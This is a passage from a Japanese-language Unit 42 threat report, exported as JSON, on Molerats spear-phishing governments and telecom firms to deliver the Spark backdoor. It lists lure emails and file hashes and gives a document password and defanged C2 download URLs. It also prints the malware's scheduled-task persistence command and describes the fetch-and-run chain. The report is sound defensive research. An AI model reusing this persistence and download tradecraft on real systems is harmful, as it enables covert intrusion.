{"id":105222,"date":"2020-03-10T00:25:36","date_gmt":"2020-03-10T07:25:36","guid":{"rendered":"https:\/\/unit42.paloaltonetworks.com\/?p=105222"},"modified":"2020-03-10T00:25:36","modified_gmt":"2020-03-10T07:25:36","slug":"molerats-delivers-spark-backdoor","status":"publish","type":"post","link":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/molerats-delivers-spark-backdoor\/","title":{"rendered":"Molerats\u306b\u3088\u308b\u653f\u5e9c\u6a5f\u95a2\u304a\u3088\u3073\u901a\u4fe1\u4e8b\u696d\u8005\u3078\u306eSpark\u30d0\u30c3\u30af\u30c9\u30a2\u306e\u914d\u4fe1"},"content":{"rendered":"<h2>\u6982\u8981<\/h2>\n<p>2019\u5e7410\u6708\u304b\u30892019\u5e7412\u6708\u521d\u3081\u306b\u304b\u3051\u3066\u3001Unit 42\u306f\u3001Molerats(\u5225\u540dGaza Hackers Team\u304a\u3088\u3073Gaza Cybergang)\u3068\u3057\u3066\u77e5\u3089\u308c\u308b\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306b\u95a2\u9023\u3059\u308b\u3068\u307f\u3089\u308c\u308b\u3001\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u653b\u6483\u306e\u8907\u6570\u306e\u30a4\u30f3\u30b9\u30bf\u30f3\u30b9\u3092\u89b3\u6e2c\u3057\u307e\u3057\u305f\u3002\u3053\u308c\u3089\u306f\u30016\u30ab\u56fd\u306b\u304a\u3051\u308b\u653f\u5e9c\u3001\u901a\u4fe1\u4e8b\u696d\u8005\u3001\u4fdd\u967a\u304a\u3088\u3073\u5c0f\u58f2\u696d\u754c\u3068\u3044\u3063\u305f8\u3064\u306e\u7d44\u7e54\u3092\u6a19\u7684\u3068\u3057\u3066\u3044\u307e\u3057\u305f\u3002\u6700\u5f8c\u306e2\u3064(\u4fdd\u967a\u304a\u3088\u3073\u5c0f\u58f2\u696d\u754c)\u306f\u975e\u5e38\u306b\u7279\u7570\u306a\u3082\u306e\u3067\u3059\u3002\u4fdd\u967a\u304a\u3088\u3073\u5c0f\u58f2\u7d44\u7e54\u306f\u3001\u3053\u306e\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306e\u3053\u308c\u307e\u3067\u306e\u6a19\u7684\u8a2d\u5b9a\u3068\u306f\u5408\u81f4\u305b\u305a\u3001\u7279\u7570\u306a\u30b1\u30fc\u30b9\u3067\u3059\u3002\u3053\u306e\u3088\u3046\u306a\u7279\u6b8a\u306a\u6a19\u7684\u3078\u306e\u653b\u6483\u3067\u4f7f\u7528\u3055\u308c\u305f\u96fb\u5b50\u30e1\u30fc\u30eb\u306e\u4ef6\u540d\u3068\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb\u540d\u306f\u3001\u653f\u5e9c\u6a5f\u95a2\u3078\u306e\u653b\u6483\u3067\u4f7f\u7528\u3055\u308c\u305f\u30c6\u30fc\u30de\u3068\u985e\u4f3c\u3057\u3066\u3044\u307e\u3057\u305f\u3002\u696d\u7a2e\u56fa\u6709\u3001\u3059\u306a\u308f\u3061\u6a19\u7684\u306b\u56fa\u6709\u306e\u30bd\u30fc\u30b7\u30e3\u30eb \u30a8\u30f3\u30b8\u30cb\u30a2\u30ea\u30f3\u30b0 \u30c6\u30fc\u30de\u304c\u306a\u3044\u3068\u3044\u3046\u3053\u3068\u306f\u3001\u4fb5\u5bb3\u304c\u6210\u529f\u3059\u308b\u6a5f\u4f1a\u304c\u6e1b\u308b\u3053\u3068\u3092\u610f\u5473\u3057\u307e\u3059\u3002\u3055\u3089\u306b\u3001\u3053\u308c\u3089\u306e\u7d44\u7e54\u3078\u306e\u653b\u6483\u76ee\u7684\u3092\u5224\u65ad\u3059\u308b\u969b\u306b\u6df7\u4e71\u304c\u751f\u3058\u307e\u3059\u3002<\/p>\n<p>\u3059\u3079\u3066\u306e\u653b\u6483\u3067\u306f\u3001\u60aa\u610f\u306e\u3042\u308b\u6587\u66f8\u3092\u914d\u4fe1\u3059\u308b\u305f\u3081\u306e\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u96fb\u5b50\u30e1\u30fc\u30eb\u304c\u4f7f\u7528\u3055\u308c\u3066\u3044\u307e\u3057\u305f\u3002\u3053\u308c\u306b\u306f\u3001\u53d7\u4fe1\u8005\u306b\u3088\u308b\u30a2\u30af\u30b7\u30e7\u30f3\u306e\u5b9f\u884c\u304c\u5fc5\u8981\u3068\u306a\u308a\u307e\u3059\u3002\u30bd\u30fc\u30b7\u30e3\u30eb \u30a8\u30f3\u30b8\u30cb\u30a2\u30ea\u30f3\u30b0\u306e\u624b\u6cd5\u306b\u306f\u3001\u30e6\u30fc\u30b6\u30fc\u304c\u30b3\u30f3\u30c6\u30f3\u30c4\u3092\u6709\u52b9\u5316\u3057\u3066\u30de\u30af\u30ed\u3092\u5b9f\u884c\u3055\u305b\u308b\u3088\u3046\u8a98\u5c0e\u3059\u308b\u305f\u3081\u306e\u30eb\u30a2\u30fc\u753b\u50cf\u3084\u3001\u6065\u305a\u304b\u3057\u3044\u5199\u771f\u3092\u30de\u30b9\u30b3\u30df\u306b\u516c\u8868\u3059\u308b\u3068\u8105\u3057\u3066\u3001\u60aa\u610f\u306e\u3042\u308b\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3059\u308b\u305f\u3081\u306e\u30ea\u30f3\u30af\u3092\u30e6\u30fc\u30b6\u30fc\u306b\u30af\u30ea\u30c3\u30af\u3055\u305b\u3088\u3046\u3068\u3059\u308b\u6587\u66f8\u306e\u30b3\u30f3\u30c6\u30f3\u30c4\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3057\u305f\u3002\u3053\u308c\u3089\u306e\u653b\u6483\u306e\u307b\u3068\u3093\u3069\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001<a href=\"https:\/\/www.cybereason.com\/blog\/new-cyber-espionage-campaigns-targeting-palestinians-part-one\">Spark<\/a>\u3068\u547c\u3070\u308c\u308b\u30d0\u30c3\u30af\u30c9\u30a2\u3067\u3057\u305f\u3002\u3053\u308c\u306f\u3001\u653b\u6483\u8005\u304c\u4fb5\u5bb3\u3055\u308c\u305f\u30b7\u30b9\u30c6\u30e0\u3067\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3092\u958b\u3044\u3066\u30b3\u30de\u30f3\u30c9\u30e9\u30a4\u30f3\u306e\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3067\u304d\u308b\u3088\u3046\u306b\u3059\u308b\u30d0\u30c3\u30af\u30c9\u30a2\u3067\u3059\u3002<\/p>\n<p>Spark\u30d0\u30c3\u30af\u30c9\u30a2\u306f\u5c11\u306a\u304f\u3068\u30822017\u5e74\u304b\u3089Molerats\u306b\u3088\u3063\u3066\u4f7f\u7528\u3055\u308c\u3066\u304a\u308a\u3001Gaza Cybergang\u306b\u3088\u308b<a href=\"https:\/\/securelist.com\/operation-parliament-who-is-doing-what\/85237\/\">Operation Parliament<\/a>\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3068\u95a2\u4fc2\u3057\u3066\u3044\u307e\u3059\u3002\u653b\u6483\u306e1\u3064\u3067\u914d\u4fe1\u3055\u308c\u305f\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001<a href=\"https:\/\/blog.talosintelligence.com\/2020\/01\/jhonerat.html\">JhoneRAT<\/a>\u306b\u95a2\u4fc2\u3057\u3066\u3044\u308b\u3068\u307f\u3089\u308c\u307e\u3059\u3002\u3053\u308c\u306f\u3001\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u304c\u30c4\u30fc\u30eb\u30bb\u30c3\u30c8\u306b\u5225\u306e\u30ab\u30b9\u30bf\u30e0\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u8ffd\u52a0\u3057\u305f\u3053\u3068\u3092\u793a\u5506\u3057\u3066\u3044\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n<p>Molerats\u306f\u3001\u4e16\u754c\u4e2d\u306e\u653f\u5e9c\u6a5f\u95a2\u3092\u6a19\u7684\u3068\u3057\u3066\u3001\u4e3b\u306b\u4e0d\u6b63\u30a2\u30af\u30bb\u30b9\u3084\u6a5f\u5bc6\u30c7\u30fc\u30bf\u306e\u53ce\u96c6\u3092\u4f34\u3046\u653b\u6483\u306b\u95a2\u9023\u3059\u308b\u6d3b\u52d5\u30922011\u5e74\u304b\u3089\u884c\u3063\u3066\u3044\u307e\u3059\u3002PoisonIvy\u3084XtremeRAT\u306a\u3069\u306e\u4e00\u822c\u516c\u958b\u3055\u308c\u3066\u3044\u308b\u30d0\u30c3\u30af\u30c9\u30a2\u30c4\u30fc\u30eb\u3092\u6d3b\u7528\u3057\u305f\u308a\u3001<a href=\"https:\/\/unit42.paloaltonetworks.com\/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia\/\">KASPERAGENT\u304a\u3088\u3073MICROPSIA<\/a>\u3068\u3044\u3063\u305f\u30ab\u30b9\u30bf\u30e0\u958b\u767a\u306e\u30c4\u30fc\u30eb\u3092\u4f5c\u6210\u3059\u308b\u306a\u3069\u3001\u591a\u6570\u306e\u6226\u8853\u3084\u624b\u6cd5\u3092\u4f7f\u7528\u3057\u3066\u3044\u308b\u3053\u3068\u304c\u89b3\u6e2c\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u5f0a\u793e\u304c\u8ffd\u8de1\u3057\u305f\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3067\u306f\u3001\u3053\u306e\u30b0\u30eb\u30fc\u30d7\u306f\u5f53\u521d\u306f\u521d\u671f\u306e\u611f\u67d3\u30d9\u30af\u30c8\u30eb\u306b\u30bd\u30fc\u30b7\u30e3\u30eb \u30a8\u30f3\u30b8\u30cb\u30a2\u30ea\u30f3\u30b0\u3068\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u306e\u624b\u6cd5\u3092\u5229\u7528\u3057\u3066\u3044\u307e\u3057\u305f\u304c\u3001\u305d\u306e\u5f8c\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u914d\u4fe1\u306b\u6bb5\u968e\u7684\u306a\u30b3\u30de\u30f3\u30c9\u30a2\u30f3\u30c9\u30b3\u30f3\u30c8\u30ed\u30fc\u30eb(C2)\u30b5\u30fc\u30d0\u30fc\u3092\u5229\u7528\u3059\u308b\u3088\u3046\u306b\u306a\u308a\u307e\u3057\u305f\u3002<\/p>\n<p>Molerats\u306f\u3001\u914d\u4fe1\u6587\u66f8\u3092\u30d1\u30b9\u30ef\u30fc\u30c9\u4fdd\u8b77\u3057\u305f\u308a\u3001Spark\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u5b9f\u884c\u3092\u30a2\u30e9\u30d3\u30a2\u8a9e\u306e\u30ad\u30fc\u30dc\u30fc\u30c9\u3068\u30ed\u30b1\u30fc\u30eb\u3092\u4f7f\u7528\u3059\u308b\u30b7\u30b9\u30c6\u30e0\u3067\u306e\u5b9f\u884c\u306b\u306e\u307f\u5236\u9650\u3057\u305f\u308a\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u96e3\u8aad\u5316\u306b\u5546\u7528\u30d1\u30c3\u30ab\u30fc\u306eEnigma\u3092\u4f7f\u7528\u3057\u305f\u308a\u3059\u308b\u306a\u3069\u3001\u691c\u51fa\u3068\u5206\u6790\u3092\u56f0\u96e3\u306b\u3059\u308b\u305f\u3081\u306b\u3055\u307e\u3056\u307e\u306a\u624b\u6cd5\u3092\u4f7f\u7528\u3057\u307e\u3057\u305f\u3002\u307e\u305f\u3001Spark C2\u30c1\u30e3\u30cd\u30eb\u306f\u30013DES\u307e\u305f\u306fAES\u306e\u3044\u305a\u308c\u304b\u3092\u4f7f\u7528\u3057\u3066\u3001HTTP POST\u8981\u6c42\u304a\u3088\u3073\u5fdc\u7b54\u306e\u30c7\u30fc\u30bf\u3092\u3001\u5404\u30da\u30a4\u30ed\u30fc\u30c9\u3067\u4e00\u610f\u306b\u30e9\u30f3\u30c0\u30e0\u751f\u6210\u3055\u308c\u305f\u30ad\u30fc\u3067\u6697\u53f7\u5316\u3059\u308b\u3053\u3068\u3067\u3001\u691c\u51fa\u3092\u56de\u907f\u3057\u3088\u3046\u3068\u3057\u307e\u3059\u3002<\/p>\n<h2><a id=\"post-105222-starting-point\"><\/a>\u51fa\u767a\u70b9<\/h2>\n<p>2019\u5e7411\u6708\u3001Unit 42\u306f\u30b5\u30a6\u30b8\u30a2\u30e9\u30d3\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u306b\u5411\u3051\u305f\u4e00\u901a\u306e\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u96fb\u5b50\u30e1\u30fc\u30eb\u3092\u8a8d\u8b58\u3057\u307e\u3057\u305f\u3002\u3053\u306e\u653b\u6483\u3067\u306f\u3001\u57cb\u3081\u8fbc\u307f\u30de\u30af\u30ed\u304c\u542b\u307e\u308c\u3001\u30d1\u30b9\u30ef\u30fc\u30c9\u4fdd\u8b77\u3055\u308c\u305fMicrosoft Word\u6587\u66f8\u304c\u4f7f\u7528\u3055\u308c\u3066\u3044\u307e\u3057\u305f\u3002\u6587\u66f8\u306e\u30d1\u30b9\u30ef\u30fc\u30c9\u306f\u3001\u96fb\u5b50\u30e1\u30fc\u30eb\u306e\u672c\u6587\u5185\u3067\u88ab\u5bb3\u8005\u306b\u63d0\u4f9b\u3055\u308c\u3066\u3044\u307e\u3057\u305f\u3002\u3053\u306e\u653b\u6483\u3067\u767a\u898b\u3055\u308c\u305f\u30a2\u30fc\u30c6\u30a3\u30d5\u30a1\u30af\u30c8\u304b\u3089\u3001\u5f0a\u793e\u306fAutoFocus\u88fd\u54c1\u3092\u4f7f\u7528\u3057\u3066\u8ffd\u52a0\u306e\u653b\u6483\u3092\u78ba\u8a8d\u3057\u3001Molerats\u306b\u3088\u308b\u653b\u6483\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3092\u898b\u3064\u3051\u51fa\u3059\u3053\u3068\u304c\u3067\u304d\u307e\u3057\u305f\u3002<\/p>\n<p>\u5f0a\u793e\u306f\u3001AutoFocus\u30c4\u30fc\u30eb\u3092\u4f7f\u7528\u3057\u3066\u30012019\u5e7410\u67082\u65e5\u304b\u308912\u67089\u65e5\u306e\u9593\u306b\u653b\u6483\u8005\u304b\u3089\u9001\u4fe1\u3055\u308c\u305f\u3055\u307e\u3056\u307e\u306a\u653b\u6483\u3092\u898b\u3064\u3051\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3057\u305f\u3002\u3053\u306e\u96fb\u5b50\u30e1\u30fc\u30eb\u306f\u653f\u5e9c\u6a5f\u95a2\u3084\u901a\u4fe1\u4e8b\u696d\u8005\u306e\u7d44\u7e54\u306b\u7e26\u65ad\u7684\u306b\u9001\u4fe1\u3055\u308c\u307e\u3057\u305f\u304c\u3001\u96fb\u5b50\u30e1\u30fc\u30eb\u306b\u306f\u7279\u5b9a\u306e\u4ef6\u540d\u304a\u3088\u3073\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb\u540d\u3068\u3001\u6c4e\u7528\u7684\u306a\u4ef6\u540d\u304a\u3088\u3073\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb\u540d\u304c\u6df7\u5728\u3057\u3066\u3044\u307e\u3057\u305f\u3002\u3055\u3089\u306b\u3001\u3053\u306e\u653b\u6483\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306b\u95a2\u3059\u308b\u30bb\u30c3\u30b7\u30e7\u30f3\u304c\u3001\u7c73\u56fd\u306e2\u3064\u306e\u7d44\u7e54\u306b\u95a2\u4e0e\u3057\u3066\u3044\u308b\u3053\u3068\u304c\u78ba\u8a8d\u3055\u308c\u307e\u3057\u305f\u3002\u305d\u306e1\u3064\u304c\u5c0f\u58f2\u3001\u3082\u30461\u3064\u304c\u4fdd\u967a\u696d\u754c\u3067\u3059\u3002<\/p>\n<p>\u3053\u308c\u3089\u306e\u96fb\u5b50\u30e1\u30fc\u30eb\u306b\u6dfb\u4ed8\u3055\u308c\u3066\u3044\u305f\u30d5\u30a1\u30a4\u30eb\u306f\u3001\u3059\u3079\u3066\u6587\u66f8\u5f62\u5f0f\u3067\u3001\u307b\u3068\u3093\u3069\u304cWord\u6587\u66f8\u30011\u3064\u304cPDF\u6587\u66f8\u3067\u3057\u305f\u3002\u88681\u306f\u3001\u3053\u306e\u653b\u6483\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3067\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u96fb\u5b50\u30e1\u30fc\u30eb\u306e\u30ea\u30b9\u30c8\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002\u96fb\u5b50\u30e1\u30fc\u30eb\u306e\u8a73\u7d30\u3068\u3001\u6a19\u7684\u3068\u306a\u3063\u305f\u7d44\u7e54\u306e\u56fd\u304a\u3088\u3073\u696d\u7a2e\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u30d6\u30ed\u30b0\u3067\u306f\u3001\u88681\u306b\u793a\u3055\u308c\u305f7\u4ef6\u306e\u914d\u4fe1\u6587\u66f8\u306e\u3046\u3061\u30013\u4ef6\u306b\u3064\u3044\u3066\u5206\u6790\u3057\u307e\u3059\u3002\u30d5\u30a1\u30a4\u30eb\u540d\u306bMOFA\u306e\u5165\u3063\u305f4\u4ef6\u306e\u4e00\u610f\u306e\u914d\u4fe1\u6587\u66f8\u306f\u3001\u305d\u308c\u305e\u308c\u975e\u5e38\u306b\u985e\u4f3c\u3057\u3066\u3044\u307e\u3059\u3002\u6700\u5f8c\u306e\u914d\u4fe1\u6587\u66f8('Urgent.docx')\u306f\u3001<a href=\"https:\/\/blog.talosintelligence.com\/2020\/01\/jhonerat.html\">JhoneRAT\u3068\u547c\u3070\u308c\u308b\u65b0\u3057\u3044\u30da\u30a4\u30ed\u30fc\u30c9\u306b\u95a2\u3059\u308bCisco Talos\u306e\u8abf\u67fb<\/a>\u3067\u8aac\u660e\u3055\u308c\u3066\u3044\u308b\u914d\u4fe1\u6587\u66f8\u3067\u3001\u3053\u306e\u30b0\u30eb\u30fc\u30d7\u304c\u8a72\u5f53\u5730\u57df\u306e\u653b\u6483\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3067JhoneRAT\u3082\u4f7f\u7528\u3057\u3066\u3044\u308b\u3053\u3068\u3092\u793a\u5506\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>\u65e5\u4ed8<\/strong><\/td>\n<td><strong>\u4ef6\u540d<\/strong><\/td>\n<td><strong>\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb<\/strong><\/td>\n<td><strong>SHA256<\/strong><\/td>\n<td><strong>\u56fd<\/strong><\/td>\n<td><strong>\u696d\u7a2e<\/strong><\/td>\n<\/tr>\n<tr>\n<td>2019\u5e7410\u67082\u65e5<\/td>\n<td>MOFA reports 03-10-2019<\/td>\n<td>MOFA- 031019.doc<\/td>\n<td>d19104ef4f443e8..<\/td>\n<td>\u30a2\u30e9\u30d6\u9996\u9577\u56fd\u9023\u90a6<\/td>\n<td>\u653f\u5e9c<\/td>\n<\/tr>\n<tr>\n<td>2019\u5e7410\u67083\u65e5<\/td>\n<td>03-10-2019<\/td>\n<td>MOFA- 031019.doc<\/td>\n<td>d19104ef4f443e8..<\/td>\n<td>\u82f1\u56fd\u3001\u30b9\u30da\u30a4\u30f3<\/td>\n<td>\u653f\u5e9c<\/td>\n<\/tr>\n<tr>\n<td>2019\u5e7410\u67085\u65e5<\/td>\n<td>06-10-2019<\/td>\n<td>MOFA- 061019.doc<\/td>\n<td>03be1d7e1071b01..<\/td>\n<td>\u30a2\u30e9\u30d6\u9996\u9577\u56fd\u9023\u90a6<\/td>\n<td>\u653f\u5e9c<\/td>\n<\/tr>\n<tr>\n<td>2019\u5e7410\u670810\u65e5<\/td>\n<td>MOFA Reports<\/td>\n<td>MOFA- 101019.doc<\/td>\n<td>011ba7f9b4c508f..<\/p>\n<p>ddf938508618ff7..<\/td>\n<td>\u7c73\u56fd<\/td>\n<td>\u4fdd\u967a\u3001\u5c0f\u58f2<\/td>\n<\/tr>\n<tr>\n<td>2019\u5e7410\u670831\u65e5<\/td>\n<td>\u0644\u0639\u0646\u0627\u064a\u0629 \u0645\u0639\u0627\u0644\u064a\u0643\u0645 \u2013 \u0627\u0644\u0645\u0631\u0641\u0642 31-10-2019<\/td>\n<td>attachment.doc<\/td>\n<td>eaf2ba0d78c0fda..<\/td>\n<td>\u30b8\u30d6\u30c1<\/td>\n<td>\u901a\u4fe1\u4e8b\u696d\u8005<\/td>\n<\/tr>\n<tr>\n<td>2019\u5e7411\u67082\u65e5<\/td>\n<td>\u0644\u0639\u0646\u0627\u064a\u0629 \u0645\u0639\u0627\u0644\u064a\u0643\u0645 \u2013 \u0627\u0644\u0645\u0631\u0641\u0642 31-10-2019<\/td>\n<td>attachment.doc<\/td>\n<td>eaf2ba0d78c0fda..<\/td>\n<td>\u30b8\u30d6\u30c1<\/td>\n<td>\u901a\u4fe1\u4e8b\u696d\u8005<\/td>\n<\/tr>\n<tr>\n<td>2019\u5e7411\u670818\u65e5<\/td>\n<td>\u0635\u0648\u0631\u0643<\/p>\n<p>&lt;\u7de8\u96c6\u6e08\u307f&gt;<\/p>\n<p>\u0645\u0639 \u0647\u0628\u0629<\/td>\n<td>Pictures.pdf<\/td>\n<td>9d6ce7c585609b8..<\/td>\n<td>\u30b9\u30da\u30a4\u30f3<\/td>\n<td>\u653f\u5e9c<\/td>\n<\/tr>\n<tr>\n<td>2019\u5e7411\u670824\u65e5<\/td>\n<td>\u0645\u062e\u0637\u0637 \u0627\u0644\u062c\u0647\u0627\u062f \u0627\u0644\u0627\u0633\u0644\u0627\u0645\u064a \u0644\u0645\u0628\u0627\u063a\u062a\u0629 \u0627\u0633\u0631\u0627\u0626\u064a\u0644 \u0648\u0636\u0631\u0628 \u0627\u0644\u062a\u0647\u062f\u0626\u0629<\/td>\n<td>Urgent.docx<\/td>\n<td>273aa20c4857d98..<\/td>\n<td>\u30b8\u30d6\u30c1<\/td>\n<td>\u901a\u4fe1\u4e8b\u696d\u8005<\/td>\n<\/tr>\n<tr>\n<td>2019\u5e7412\u67089\u65e5<\/td>\n<td>\u0645\u062d\u0636\u0631 \u0627\u062c\u062a\u0645\u0627\u0639 \u0642\u064a\u0627\u062f\u0629 \u0627\u0644\u0645\u062e\u0627\u0628\u0631\u0627\u062a \u0627\u0644\u0639\u0627\u0645\u0629 \u0645\u0639 \u0648\u0641\u062f \u062d\u0631\u0643\u0629 \u062d\u0645\u0627\u0633 09-12-2019<\/td>\n<td>Urgent.docx<\/td>\n<td>273aa20c4857d98..<\/td>\n<td>\u30b8\u30d6\u30c1<\/td>\n<td>\u901a\u4fe1\u4e8b\u696d\u8005<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-size: 10pt;\"><em>\u88681. \u3053\u306e\u653b\u6483\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3067\u5224\u660e\u3057\u305f\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u96fb\u5b50\u30e1\u30fc\u30eb\u306e\u8a73\u7d30<\/em><\/span><\/p>\n<h2><a id=\"post-105222-mofa-delivery-document\"><\/a>MOFA\u3068\u5165\u3063\u305f\u914d\u4fe1\u6587\u66f8<\/h2>\n<p>\u53ce\u96c6\u3068\u5206\u6790\u3092\u884c\u3063\u305f\u6700\u521d\u306e\u6587\u66f8\u306e\u30d5\u30a1\u30a4\u30eb\u540d\u306f\u3001MOFA- 061019.doc (SHA256: 03be1d7e1071b018d3fbc6496788fd7234b0bb6d3614bec5b482f3bf95aeb506)\u3068\u3044\u3046\u3082\u306e\u3067\u3057\u305f\u3002\u3053\u306e\u6587\u66f8\u306f\u3001Abdullah@2019\u3068\u3044\u3046\u30d1\u30b9\u30ef\u30fc\u30c9\u3067\u30d1\u30b9\u30ef\u30fc\u30c9\u4fdd\u8b77\u3055\u308c\u3066\u3044\u307e\u3057\u305f\u3002\u3053\u306e\u6587\u66f8\u3092\u958b\u3044\u3066\u30d1\u30b9\u30ef\u30fc\u30c9\u3092\u5165\u529b\u3059\u308b\u3068\u304d\u306b\u3001\u56f31\u306b\u793a\u3059\u6b20\u843d\u3057\u305f\u753b\u50cf\u3092\u542b\u3080\u30b3\u30f3\u30c6\u30f3\u30c4\u304c\u88ab\u5bb3\u8005\u306b\u8868\u793a\u3055\u308c\u307e\u3057\u305f\u3002<\/p>\n<p><span style=\"font-size: 10pt;\"><img width=\"2112\" height=\"936\"  class=\"wp-image-105225 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/03\/figure-1-lure-image-in-mofa-delivery-document.png\" alt=\"Figure 1. Lure image in MOFA delivery document\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\">\u56f31. MOFA\u3068\u5165\u3063\u305f\u914d\u4fe1\u6587\u66f8\u5185\u306e\u30eb\u30a2\u30fc\u753b\u50cf<\/span><\/p>\n<p>\u88ab\u5bb3\u8005\u304c\u6587\u66f8\u5185\u306e\u57cb\u3081\u8fbc\u307f\u30de\u30af\u30ed\u3092\u6709\u52b9\u5316\u3059\u308b\u3068\u3001\u30de\u30af\u30ed\u306b\u3088\u3063\u3066\u57cb\u3081\u8fbc\u307f\u306eVBScript (<a href=\"https:\/\/attack.mitre.org\/techniques\/T1064\">T1064<\/a>)\u304c\u30c7\u30b3\u30fc\u30c9\u3055\u308c\u3001C:\\programdata\\Micorsoft\\Microsoft.vbs\u306b\u4fdd\u5b58\u3055\u308c\u307e\u3059\u3002Microsoft.vbs\u30b9\u30af\u30ea\u30d7\u30c8\u306fC2\u30c9\u30e1\u30a4\u30f3\u306eservicebios[.]com\u306b\u30a2\u30af\u30bb\u30b9\u3057\u30012\u756a\u76ee\u306eVBScript\u3092\u53d6\u5f97\u3057\u307e\u3059\u3002\u3053\u308c\u306b\u306f\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u53d6\u5f97\u3059\u308b\u305f\u3081\u306e\u8ffd\u52a0\u306e\u6307\u793a\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u30b9\u30af\u30ea\u30d7\u30c8\u306f\u3001\u6b21\u306eURL\u304b\u30892\u756a\u76ee\u306eVBScript\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3001C:\\ProgramData\\PlayerVLC.vbs\u306b\u4fdd\u5b58\u3057\u307e\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">https:\/\/servicebios[.]com\/PlayerVLC.vbs<\/span><\/p>\n<p>\u6700\u521d\u306eVBScript\u306f\u3001\u6b21\u306e\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u3066\u30012\u756a\u76ee\u306eVBScript\u30921\u5206\u3054\u3068\u306b\u5b9f\u884c\u3057\u7d9a\u3051\u308b\u305f\u3081\u306e\u30b9\u30b1\u30b8\u30e5\u30fc\u30eb\u3055\u308c\u305f\u30bf\u30b9\u30af(<a href=\"https:\/\/attack.mitre.org\/techniques\/T1053\/\">T1053<\/a>)\u3092\u4f5c\u6210\u3057\u307e\u3059\u3002<\/p>\n<p>schtasks \/create \/sc minute \/mo 1 \/tn PlayerVLC \/F \/tr C:\\ProgramData\\PlayerVLC.vbs<\/p>\n<p>2\u756a\u76ee\u306eVBScript\u306f\u3001\u6b21\u306eURL\u304b\u3089\u5b9f\u884c\u53ef\u80fd\u306a\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3092\u8a66\u307f\u3001C:\\ProgramData\\PlayerVLC.msi\u306b\u4fdd\u5b58\u3057\u307e\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">https:\/\/servicebios[.]com\/PlayerVLC.msi<\/span><\/p>\n<p>\u5b9f\u884c\u53ef\u80fd\u306a\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u305f\u5f8c\u30012\u756a\u76ee\u306eVBScript\u306f\u3001\u30b3\u30de\u30f3\u30c9\u30e9\u30a4\u30f3\u3067\u6b21\u306e\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u3066(<a href=\"https:\/\/attack.mitre.org\/techniques\/T1059\">T1059<\/a>)\u65e2\u5b58\u306emsiexec.exe\u30d7\u30ed\u30bb\u30b9 \u30a4\u30f3\u30b9\u30bf\u30f3\u30b9\u3092\u5f37\u5236\u7d42\u4e86\u3057\u3001ping\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3092\u4f7f\u7528\u3057\u30662\u79d2\u9593\u30b9\u30ea\u30fc\u30d7\u3055\u305b\u3066\u304b\u3089\u3001\u6b63\u898f\u306emsiexec.exe\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3092\u4f7f\u7528\u3057\u3066(<a 